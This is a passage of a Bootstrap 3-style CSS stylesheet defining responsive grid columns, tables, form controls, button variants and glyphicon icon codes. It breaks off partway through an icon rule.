.col-sm-offset-6 {
margin-left: 50%;
}
.col-sm-offset-5 {
margin-left: 41.66666666666667%;
}
.col-sm-offset-4 {
margin-left: 33.33333333333333%;
}
.col-sm-offset-3 {
margin-left: 25%;
}
.col-sm-offset-2 {
margin-left: 16.666666666666664%;
}
.col-sm-offset-1 {
margin-left: 8.333333333333332%;
}
.col-sm-offset-0 {
margin-left: 0;
}
}
@media (min-width: 992px) {
.col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
float: left;
}
.col-md-12 {
width: 100%;
}
.col-md-11 {
width: 91.66666666666666%;
}
.col-md-10 {
width: 83.33333333333334%;
}
.col-md-9 {
width: 75%;
}
.col-md-8 {
width: 66.66666666666666%;
}
.col-md-7 {
width: 58.333333333333336%;
}
.col-md-6 {
width: 50%;
}
.col-md-5 {
width: 41.66666666666667%;
}
.col-md-4 {
width: 33.33333333333333%;
}
.col-md-3 {
width: 25%;
}
.col-md-2 {
width: 16.666666666666664%;
}
.col-md-1 {
width: 8.333333333333332%;
}
.col-md-pull-12 {
right: 100%;
}
.col-md-pull-11 {
right: 91.66666666666666%;
}
.col-md-pull-10 {
right: 83.33333333333334%;
}
.col-md-pull-9 {
right: 75%;
}
.col-md-pull-8 {
right: 66.66666666666666%;
}
.col-md-pull-7 {
right: 58.333333333333336%;
}
.col-md-pull-6 {
right: 50%;
}
.col-md-pull-5 {
right: 41.66666666666667%;
}
.col-md-pull-4 {
right: 33.33333333333333%;
}
.col-md-pull-3 {
right: 25%;
}
.col-md-pull-2 {
right: 16.666666666666664%;
}
.col-md-pull-1 {
right: 8.333333333333332%;
}
.col-md-pull-0 {
right: 0;
}
.col-md-push-12 {
left: 100%;
}
.col-md-push-11 {
left: 91.66666666666666%;
}
.col-md-push-10 {
left: 83.33333333333334%;
}
.col-md-push-9 {
left: 75%;
}
.col-md-push-8 {
left: 66.66666666666666%;
}
.col-md-push-7 {
left: 58.333333333333336%;
}
.col-md-push-6 {
left: 50%;
}
.col-md-push-5 {
left: 41.66666666666667%;
}
.col-md-push-4 {
left: 33.33333333333333%;
}
.col-md-push-3 {
left: 25%;
}
.col-md-push-2 {
left: 16.666666666666664%;
}
.col-md-push-1 {
left: 8.333333333333332%;
}
.col-md-push-0 {
left: 0;
}
.col-md-offset-12 {
margin-left: 100%;
}
.col-md-offset-11 {
margin-left: 91.66666666666666%;
}
.col-md-offset-10 {
margin-left: 83.33333333333334%;
}
.col-md-offset-9 {
margin-left: 75%;
}
.col-md-offset-8 {
margin-left: 66.66666666666666%;
}
.col-md-offset-7 {
margin-left: 58.333333333333336%;
}
.col-md-offset-6 {
margin-left: 50%;
}
.col-md-offset-5 {
margin-left: 41.66666666666667%;
}
.col-md-offset-4 {
margin-left: 33.33333333333333%;
}
.col-md-offset-3 {
margin-left: 25%;
}
.col-md-offset-2 {
margin-left: 16.666666666666664%;
}
.col-md-offset-1 {
margin-left: 8.333333333333332%;
}
.col-md-offset-0 {
margin-left: 0;
}
}
@media (min-width: 1200px) {
.col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
float: left;
}
.col-lg-12 {
width: 100%;
}
.col-lg-11 {
width: 91.66666666666666%;
}
.col-lg-10 {
width: 83.33333333333334%;
}
.col-lg-9 {
width: 75%;
}
.col-lg-8 {
width: 66.66666666666666%;
}
.col-lg-7 {
width: 58.333333333333336%;
}
.col-lg-6 {
width: 50%;
}
.col-lg-5 {
width: 41.66666666666667%;
}
.col-lg-4 {
width: 33.33333333333333%;
}
.col-lg-3 {
width: 25%;
}
.col-lg-2 {
width: 16.666666666666664%;
}
.col-lg-1 {
width: 8.333333333333332%;
}
.col-lg-pull-12 {
right: 100%;
}
.col-lg-pull-11 {
right: 91.66666666666666%;
}
.col-lg-pull-10 {
right: 83.33333333333334%;
}
.col-lg-pull-9 {
right: 75%;
}
.col-lg-pull-8 {
right: 66.66666666666666%;
}
.col-lg-pull-7 {
right: 58.333333333333336%;
}
.col-lg-pull-6 {
right: 50%;
}
.col-lg-pull-5 {
right: 41.66666666666667%;
}
.col-lg-pull-4 {
right: 33.33333333333333%;
}
.col-lg-pull-3 {
right: 25%;
}
.col-lg-pull-2 {
right: 16.666666666666664%;
}
.col-lg-pull-1 {
right: 8.333333333333332%;
}
.col-lg-pull-0 {
right: 0;
}
.col-lg-push-12 {
left: 100%;
}
.col-lg-push-11 {
left: 91.66666666666666%;
}
.col-lg-push-10 {
left: 83.33333333333334%;
}
.col-lg-push-9 {
left: 75%;
}
.col-lg-push-8 {
left: 66.66666666666666%;
}
.col-lg-push-7 {
left: 58.333333333333336%;
}
.col-lg-push-6 {
left: 50%;
}
.col-lg-push-5 {
left: 41.66666666666667%;
}
.col-lg-push-4 {
left: 33.33333333333333%;
}
.col-lg-push-3 {
left: 25%;
}
.col-lg-push-2 {
left: 16.666666666666664%;
}
.col-lg-push-1 {
left: 8.333333333333332%;
}
.col-lg-push-0 {
left: 0;
}
.col-lg-offset-12 {
margin-left: 100%;
}
.col-lg-offset-11 {
margin-left: 91.66666666666666%;
}
.col-lg-offset-10 {
margin-left: 83.33333333333334%;
}
.col-lg-offset-9 {
margin-left: 75%;
}
.col-lg-offset-8 {
margin-left: 66.66666666666666%;
}
.col-lg-offset-7 {
margin-left: 58.333333333333336%;
}
.col-lg-offset-6 {
margin-left: 50%;
}
.col-lg-offset-5 {
margin-left: 41.66666666666667%;
}
.col-lg-offset-4 {
margin-left: 33.33333333333333%;
}
.col-lg-offset-3 {
margin-left: 25%;
}
.col-lg-offset-2 {
margin-left: 16.666666666666664%;
}
.col-lg-offset-1 {
margin-left: 8.333333333333332%;
}
.col-lg-offset-0 {
margin-left: 0;
}
}
table {
max-width: 100%;
background-color: transparent;
}
th {
text-align: left;
}
.table {
width: 100%;
margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
padding: 8px;
line-height: 1.428571429;
vertical-align: top;
border-top: 1px solid #ddd;
}
.table > thead > tr > th {
vertical-align: bottom;
border-bottom: 2px solid #ddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
border-top: 0;
}
.table > tbody + tbody {
border-top: 2px solid #ddd;
}
.table .table {
background-color: #fff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
padding: 5px;
}
.table-bordered {
border: 1px solid #ddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
border: 1px solid #ddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-child(odd) > td,
.table-striped > tbody > tr:nth-child(odd) > th {
background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover > td,
.table-hover > tbody > tr:hover > th {
background-color: #f5f5f5;
}
table col[class*="col-"] {
position: static;
display: table-column;
float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
position: static;
display: table-cell;
float: none;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr.active:hover > th {
background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr.success:hover > th {
background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr.info:hover > th {
background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr.warning:hover > th {
background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr.danger:hover > th {
background-color: #ebcccc;
}
@media (max-width: 767px) {
.table-responsive {
width: 100%;
margin-bottom: 15px;
overflow-x: scroll;
overflow-y: hidden;
-webkit-overflow-scrolling: touch;
-ms-overflow-style: -ms-autohiding-scrollbar;
border: 1px solid #ddd;
}
.table-responsive > .table {
margin-bottom: 0;
}
.table-responsive > .table > thead > tr > th,
.table-responsive > .table > tbody > tr > th,
.table-responsive > .table > tfoot > tr > th,
.table-responsive > .table > thead > tr > td,
.table-responsive > .table > tbody > tr > td,
.table-responsive > .table > tfoot > tr > td {
white-space: nowrap;
}
.table-responsive > .table-bordered {
border: 0;
}
.table-responsive > .table-bordered > thead > tr > th:first-child,
.table-responsive > .table-bordered > tbody > tr > th:first-child,
.table-responsive > .table-bordered > tfoot > tr > th:first-child,
.table-responsive > .table-bordered > thead > tr > td:first-child,
.table-responsive > .table-bordered > tbody > tr > td:first-child,
.table-responsive > .table-bordered > tfoot > tr > td:first-child {
border-left: 0;
}
.table-responsive > .table-bordered > thead > tr > th:last-child,
.table-responsive > .table-bordered > tbody > tr > th:last-child,
.table-responsive > .table-bordered > tfoot > tr > th:last-child,
.table-responsive > .table-bordered > thead > tr > td:last-child,
.table-responsive > .table-bordered > tbody > tr > td:last-child,
.table-responsive > .table-bordered > tfoot > tr > td:last-child {
border-right: 0;
}
.table-responsive > .table-bordered > tbody > tr:last-child > th,
.table-responsive > .table-bordered > tfoot > tr:last-child > th,
.table-responsive > .table-bordered > tbody > tr:last-child > td,
.table-responsive > .table-bordered > tfoot > tr:last-child > td {
border-bottom: 0;
}
}
fieldset {
min-width: 0;
padding: 0;
margin: 0;
border: 0;
}
legend {
display: block;
width: 100%;
padding: 0;
margin-bottom: 20px;
font-size: 21px;
line-height: inherit;
color: #333;
border: 0;
border-bottom: 1px solid #e5e5e5;
}
label {
/*display: inline-block;*/
margin-bottom: 5px;
font-weight: bold;
}
input[type="search"] {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
margin: 4px 0 0;
margin-top: 1px \9;
/* IE8-9 */
line-height: normal;
}
input[type="file"] {
display: block;
}
input[type="range"] {
display: block;
width: 100%;
}
select[multiple],
select[size] {
height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
outline: thin dotted;
outline: 5px auto -webkit-focus-ring-color;
outline-offset: -2px;
}
output {
display: block;
padding-top: 7px;
font-size: 14px;
line-height: 1.428571429;
color: #555;
}
.form-control {
display: block;
width: 100%;
height: 34px;
padding: 6px 12px;
font-size: 14px;
line-height: 1.428571429;
color: #555;
background-color: #fff;
background-image: none;
border: 1px solid #ccc;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
-webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
border-color: #66afe9;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, .6);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, .6);
}
.form-control:-moz-placeholder {
color: #999;
}
.form-control::-moz-placeholder {
color: #999;
opacity: 1;
}
.form-control:-ms-input-placeholder {
color: #999;
}
.form-control::-webkit-input-placeholder {
color: #999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
cursor: not-allowed;
background-color: #eee;
opacity: 1;
}
textarea.form-control {
height: auto;
}
input[type="date"] {
line-height: 34px;
}
.form-group {
margin-bottom: 15px;
}
.radio,
.checkbox {
display: block;
min-height: 20px;
padding-left: 20px;
margin-top: 10px;
margin-bottom: 10px;
}
.radio label,
.checkbox label {
display: inline;
font-weight: normal;
cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
float: left;
margin-left: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
display: inline-block;
padding-left: 20px;
margin-bottom: 0;
font-weight: normal;
vertical-align: middle;
cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
margin-top: 0;
margin-left: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
.radio[disabled],
.radio-inline[disabled],
.checkbox[disabled],
.checkbox-inline[disabled],
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"],
fieldset[disabled] .radio,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox,
fieldset[disabled] .checkbox-inline {
cursor: not-allowed;
}
input[type="text"] {
padding: 2px 4px;
}
.input-sm {
height: 30px;
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
select.input-sm {
height: 30px;
line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
height: auto;
}
.input-lg {
height: 46px;
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
select.input-lg {
height: 46px;
line-height: 46px;
}
textarea.input-lg,
select[multiple].input-lg {
height: auto;
}
.has-feedback {
position: relative;
}
.has-feedback .form-control {
padding-right: 42.5px;
}
.has-feedback .form-control-feedback {
position: absolute;
top: 25px;
right: 0;
display: block;
width: 34px;
height: 34px;
line-height: 34px;
text-align: center;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline {
color: #3c763d;
}
.has-success .form-control {
border-color: #3c763d;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
}
.has-success .form-control:focus {
border-color: #2b542c;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #67b168;
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #67b168;
}
.has-success .input-group-addon {
color: #3c763d;
background-color: #dff0d8;
border-color: #3c763d;
}
.has-success .form-control-feedback {
color: #3c763d;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline {
color: #8a6d3b;
}
.has-warning .form-control {
border-color: #8a6d3b;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
}
.has-warning .form-control:focus {
border-color: #66512c;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #c0a16b;
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #c0a16b;
}
.has-warning .input-group-addon {
color: #8a6d3b;
background-color: #fcf8e3;
border-color: #8a6d3b;
}
.has-warning .form-control-feedback {
color: #8a6d3b;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline {
color: #a94442;
}
.has-error .form-control {
border-color: #a94442;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
}
.has-error .form-control:focus {
border-color: #843534;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #ce8483;
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #ce8483;
}
.has-error .input-group-addon {
color: #a94442;
background-color: #f2dede;
border-color: #a94442;
}
.has-error .form-control-feedback {
color: #a94442;
}
.form-control-static {
margin-bottom: 0;
}
.help-block {
display: block;
margin-top: 5px;
margin-bottom: 10px;
color: #737373;
}
@media (min-width: 768px) {
.form-inline .form-group {
display: inline-block;
margin-bottom: 0;
vertical-align: middle;
}
.form-inline .form-control {
display: inline-block;
width: auto;
vertical-align: middle;
}
.form-inline .control-label {
margin-bottom: 0;
vertical-align: middle;
}
.form-inline .radio,
.form-inline .checkbox {
display: inline-block;
padding-left: 0;
margin-top: 0;
margin-bottom: 0;
vertical-align: middle;
}
.form-inline .radio input[type="radio"],
.form-inline .checkbox input[type="checkbox"] {
float: none;
margin-left: 0;
}
.form-inline .has-feedback .form-control-feedback {
top: 0;
}
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
padding-top: 7px;
margin-top: 0;
margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
min-height: 27px;
}
.form-horizontal .form-group {
margin-right: -15px;
margin-left: -15px;
}
.form-horizontal .form-control-static {
padding-top: 7px;
}
@media (min-width: 768px) {
.form-horizontal .control-label {
text-align: right;
}
}
.form-horizontal .has-feedback .form-control-feedback {
top: 0;
right: 15px;
}
.btn {
display: inline-block;
padding: 6px 12px;
margin-bottom: 0;
font-size: 14px;
font-weight: normal;
line-height: 1.428571429;
text-align: center;
white-space: nowrap;
vertical-align: middle;
cursor: pointer;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
-o-user-select: none;
user-select: none;
background-image: none;
border: 1px solid transparent;
border-radius: 4px;
}
.btn:focus {
outline: thin dotted;
outline: 5px auto -webkit-focus-ring-color;
outline-offset: -2px;
}
.btn:hover,
.btn:focus {
color: #333;
text-decoration: none;
}
.btn:active,
.btn.active {
background-image: none;
outline: 0;
-webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
pointer-events: none;
cursor: not-allowed;
filter: alpha(opacity=65);
-webkit-box-shadow: none;
box-shadow: none;
opacity: .65;
}
.btn-default {
color: #333;
background-color: #fff;
border-color: #ccc;
}
.btn-default:hover,
.btn-default:focus,
.btn-default:active,
.btn-default.active,
.open .dropdown-toggle.btn-default {
color: #333;
background-color: #ebebeb;
border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open .dropdown-toggle.btn-default {
background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
background-color: #fff;
border-color: #ccc;
}
.btn-default .badge {
color: #fff;
background-color: #333;
}
.btn-primary {
color: #fff;
background-color: #428bca;
border-color: #357ebd;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary:active,
.btn-primary.active,
.open .dropdown-toggle.btn-primary {
color: #fff;
background-color: #3276b1;
border-color: #285e8e;
}
.btn-primary:active,
.btn-primary.active,
.open .dropdown-toggle.btn-primary {
background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
background-color: #428bca;
border-color: #357ebd;
}
.btn-primary .badge {
color: #428bca;
background-color: #fff;
}
.btn-success {
color: #fff;
background-color: #5cb85c;
border-color: #4cae4c;
}
.btn-success:hover,
.btn-success:focus,
.btn-success:active,
.btn-success.active,
.open .dropdown-toggle.btn-success {
color: #fff;
background-color: #47a447;
border-color: #398439;
}
.btn-success:active,
.btn-success.active,
.open .dropdown-toggle.btn-success {
background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
background-color: #5cb85c;
border-color: #4cae4c;
}
.btn-success .badge {
color: #5cb85c;
background-color: #fff;
}
.btn-info {
color: #fff;
background-color: #5bc0de;
border-color: #46b8da;
}
.btn-info:hover,
.btn-info:focus,
.btn-info:active,
.btn-info.active,
.open .dropdown-toggle.btn-info {
color: #fff;
background-color: #39b3d7;
border-color: #269abc;
}
.btn-info:active,
.btn-info.active,
.open .dropdown-toggle.btn-info {
background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
background-color: #5bc0de;
border-color: #46b8da;
}
.btn-info .badge {
color: #5bc0de;
background-color: #fff;
}
.btn-warning {
color: #fff;
background-color: #f0ad4e;
border-color: #eea236;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning:active,
.btn-warning.active,
.open .dropdown-toggle.btn-warning {
color: #fff;
background-color: #ed9c28;
border-color: #d58512;
}
.btn-warning:active,
.btn-warning.active,
.open .dropdown-toggle.btn-warning {
background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
background-color: #f0ad4e;
border-color: #eea236;
}
.btn-warning .badge {
color: #f0ad4e;
background-color: #fff;
}
.btn-danger {
color: #fff;
background-color: #d9534f;
border-color: #d43f3a;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger:active,
.btn-danger.active,
.open .dropdown-toggle.btn-danger {
color: #fff;
background-color: #d2322d;
border-color: #ac2925;
}
.btn-danger:active,
.btn-danger.active,
.open .dropdown-toggle.btn-danger {
background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
background-color: #d9534f;
border-color: #d43f3a;
}
.btn-danger .badge {
color: #d9534f;
background-color: #fff;
}
.btn-link {
font-weight: normal;
color: #428bca;
cursor: pointer;
border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
background-color: transparent;
-webkit-box-shadow: none;
box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
color: #2a6496;
text-decoration: underline;
background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
color: #999;
text-decoration: none;
}
.btn-lg {
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
.btn-sm {
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-xs {
padding: 1px 5px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-block {
display: block;
width: 100%;
padding-right: 0;
padding-left: 0;
}
.btn-block + .btn-block {
margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
width: 100%;
}
.fade {
opacity: 0;
-webkit-transition: opacity .15s linear;
transition: opacity .15s linear;
}
.fade.in {
opacity: 1;
}
.collapse {
display: none;
}
.collapse.in {
display: block;
}
.collapsing {
position: relative;
height: 0;
overflow: hidden;
-webkit-transition: height .35s ease;
transition: height .35s ease;
}
@font-face {
font-family: 'Glyphicons Halflings';
src: url('../fonts/glyphicons-halflings-regular.eot');
src: url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../fonts/glyphicons-halflings-regular.woff') format('woff'), url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg');
}
.glyphicon {
position: relative;
top: 1px;
display: inline-block;
font-family: 'Glyphicons Halflings';
font-style: normal;
font-weight: normal;
line-height: 1;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
content: "\2a";
}
.glyphicon-plus:before {
content: "\2b";
}
.glyphicon-euro:before {
content: "\20ac";
}
.glyphicon-minus:before {
content: "\2212";
}
.glyphicon-cloud:before {
content: "\2601";
}
.glyphicon-envelope:before {
content: "\2709";
}
.glyphicon-pencil:before {
content: "\270f";
}
.glyphicon-glass:before {
content: "\e001";
}
.glyphicon-music:before {
content: "\e002";
}
.glyphicon-search:before {
content: "\e003";
}
.glyphicon-heart:before {
content: "\e005";
}
.glyphicon-star:before {
content: "\e006";
}
.glyphicon-star-empty:before {
content: "\e007";
}
.glyphicon-user:before {
content: "\e008";
}
.glyphicon-film:before {
content: "\e009";
}
.glyphicon-th-large:before {
content: "\e010";
}
.glyphicon-th:before {
content: "\e011";
}
.glyphicon-th-list:before {
content: "\e012";
}
.glyphicon-ok:before {
content: "\e013";
}
.glyphicon-remove:before {
content: "\e014";
}
.glyphicon-zoom-in:before {
content: "\e015";
}
.glyphicon-zoom-out:before {
content: "\e016";
}
.glyphicon-off:before {
content: "\e017";
}
.glyphicon-signal:before {
content: "\e018";
}
.glyphicon-cog:before {
content: "\e019";
}
.glyphicon-trash:before {
content: "\e020";
}
.glyphicon-home:before {
content: "\e021";
}
.glyphicon-file:before {
content: "\e022";
}
.glyphicon-time:before {
content: "\e023";
}
.glyphicon-road:before {
content: "\e024";
}
.glyphicon-download-alt:before {
content: "\e025";
}
.glyphicon-download:before {
content: "\e026";
}
.glyphicon-upload:before {
content: "\e027";
}
.glyphicon-inbox:before {
content: "\e028";
}
.glyphicon-play-circle:before {
content: "\e029";
}
.glyphicon-repeat:before {
content: "\e030";
}
.glyphicon-refresh:before {
content: "\e031";
}
.glyphicon-list-alt:before {
content: "\e032";
}
.glyphicon-lock:before {
